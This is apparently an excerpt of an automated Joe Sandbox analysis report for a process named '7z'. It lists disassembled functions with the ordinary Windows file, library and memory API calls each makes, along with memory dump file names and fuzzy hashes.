                                                                                                                                                                                                                                                                              • Part of subcall function 00668A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00668E1D), ref: 00668A99
                                                                                                                                                                                                                                                                              • Part of subcall function 00668A60: GetLastError.KERNEL32(?,?,00000003,?,00668E1D), ref: 00668AA6
                                                                                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE ref: 00668CC7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLastPointer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 841452515-0
                                                                                                                                                                                                                                                                            • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                                                            • Instruction ID: 82761c32a1deab060c107eaf39dddce10b574df90164ba692667fed33735f3bb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCE07D22301494CBE7709FF1A4816AA8312BB457E0F488131AE4543B48CE75CCDAC710
                                                                                                                                                                                                                                                                            Function 006664D4 Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00666464: FreeLibrary.KERNELBASE(?,?,?,006664E7), ref: 00666475
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNELBASE ref: 006664F4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$FreeLoad
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 534179979-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                                                            • Instruction ID: d05150029984508f4cdd73690c071b7ae1525f7385131358a23901e891178938
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBD02E2170062082EE102BA6B8426A803022F46BE0E88C030AE0A43300DE290CEBA300
                                                                                                                                                                                                                                                                            Function 00668BF0 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                                                            • Instruction ID: 57189ae644740d76b8f7a1fcbf24aef6cc5916457041ed9bf61ae5107ef7f19f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0E04676324640CBE740CF60E400B5AB3A0F388B24F000114EE8E83B54CBBDC455CF41
                                                                                                                                                                                                                                                                            Function 00666464 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(?,?,?,006664E7), ref: 00666475
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                            • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                                                            • Instruction ID: 6788ed39708c7f37eb03fb6b28fee89ef2a8c31a8fdac6c05c6ddc47d9b3b532
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5D022A2702100D0FF150FE2F81037423906B18F00F0C8014DE044A300EF29CC9187A1
                                                                                                                                                                                                                                                                            Function 00668AF4 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                            • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                                                            • Instruction ID: 1fb58f254b690103e910bc237c5653d42a69c3b115f06d8b7cec2a22d52b81f7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38D05E76614684C7E7009FB0E04575AF764F388B64F480004EE8807774CBBDC599CF01
                                                                                                                                                                                                                                                                            Function 006626A0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1795875747-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                                                            • Instruction ID: 374024b5cba563e02caf6913df113d007d1adc60e930596a877d2b8b8923bb7c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05D0A7D170070881CF109766D4502692322B749BC4F084121DD9D0B314DD2CC1148B01
                                                                                                                                                                                                                                                                            Function 0066794C Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                                                                            • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                                                                                            • Instruction ID: e143952be07ab379490258dde9599bc7c67c0e418eab959ca11da3656fcf6dc0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84D0137570994581DF312FFAD4403641393DB55F78F184310D9B4493E0DF2585D6C711
                                                                                                                                                                                                                                                                            Function 00668BB0 Relevance: 1.5, APIs: 1, Instructions: 8timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileTime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1425588814-0
                                                                                                                                                                                                                                                                            • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                                                                                            • Instruction ID: 28c0a5a2f92846ea19b91e94d420efd4defaa1c2de487714e446dae8e9fb019d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9B09230B12400C2CB0C6722D89232C1361A78AB21FE14429C50BE5A50CD1D89E94B02
                                                                                                                                                                                                                                                                            Function 0068373C Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                                                                                            • Instruction ID: 4a4deacdcb067dda657b05fc38fa86a8e36dacc13e56fa8f487e6e1264913b8a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 402128B370426096C724EA2AF80055A77A6F74AFA4F245329FE6647784EB38C986C744
                                                                                                                                                                                                                                                                            Function 00689078 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,?,?,?,?,00689B61), ref: 0068911C
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2847158419-0
                                                                                                                                                                                                                                                                            • Opcode ID: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                                                                                            • Instruction ID: 4d1045e6e9432798e37b011489b873d535f6e143bd33fd5625e3eb0b47fefc2d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01219D37201B4185DB01EF1AE81476AB3A2F789FA8F198219DFA807394DF39C892C750
                                                                                                                                                                                                                                                                            Function 0066C90C Relevance: 1.3, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                            • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                                                                                            • Instruction ID: e8f2086252dcfd4cd6ccc24bafca9802f78682a98e87e54e6d9a81e954571011
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73113A72715E5087CB308B6DE4502B86253F7407B1B54833ADACA87B10DA7ACC939281
                                                                                                                                                                                                                                                                            Function 00693EE0 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0068419C: free.MSVCRT ref: 006841B9
                                                                                                                                                                                                                                                                              • Part of subcall function 0068419C: free.MSVCRT ref: 006841C5
                                                                                                                                                                                                                                                                              • Part of subcall function 0068419C: free.MSVCRT ref: 006841D1
                                                                                                                                                                                                                                                                              • Part of subcall function 0068419C: free.MSVCRT ref: 006841DD
                                                                                                                                                                                                                                                                              • Part of subcall function 0068419C: free.MSVCRT ref: 006841E6
                                                                                                                                                                                                                                                                              • Part of subcall function 0068419C: free.MSVCRT ref: 006841EF
                                                                                                                                                                                                                                                                              • Part of subcall function 0068419C: free.MSVCRT ref: 006841F8
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00693F45
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                                                            • Instruction ID: 31c1fe0e84eda4c70c9e54e9dc04532311804420aae6cb55d0998544b17f9f5e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73014073A24790CACB219F1DC18116DBB25F759FE8368911ADB4907760E732C883C791
                                                                                                                                                                                                                                                                            Function 00668624 Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                                                                                            • Instruction ID: 801b4d7ceb50b9e191dded39262db2d0e87c949417e40e4ac84e9c0d0effe8c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6016D763162408AE710CF24C56C35E7BA0B7D5B68F140308DBA44B3D1CBBAC54ACB94
                                                                                                                                                                                                                                                                            Function 0066CB78 Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                            • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                                                                                            • Instruction ID: b701d23a4251b4caf68406786b789c332030a15f083957e8fb338654118d2460
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0E5623505488BCB00AFB999C16B821A3FB487A5F901439EFC687701E928CCA98725
                                                                                                                                                                                                                                                                            Function 0066CB34 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 006689D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 006689EA
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0066CB49
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
